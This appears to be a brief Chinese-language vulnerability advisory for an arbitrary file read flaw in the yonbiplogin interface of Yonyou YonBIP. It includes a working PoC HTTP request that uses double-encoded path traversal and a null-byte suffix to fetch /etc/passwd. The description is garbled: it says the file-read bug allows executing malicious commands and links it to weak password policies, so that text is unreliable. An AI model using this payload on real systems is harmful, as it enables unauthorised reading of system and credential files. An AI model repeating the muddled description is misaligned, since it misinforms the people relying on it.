漏洞描述
用友Yonbipyonbiplogin接口存在任意文件读取漏洞为Web站点的网络安全漏洞,它允许攻击者在受影响的系统上执行恶意命令。这种漏洞常见于未采取强密码策略的系统,容易导致数据泄露、账户被盗等安全问题,建议立即修复,下载升级官方最新补丁包对接口鉴权等。
用友Yonbip yonbiplogin接口存在任意文件读取漏洞
PoC代码
GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg.js HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close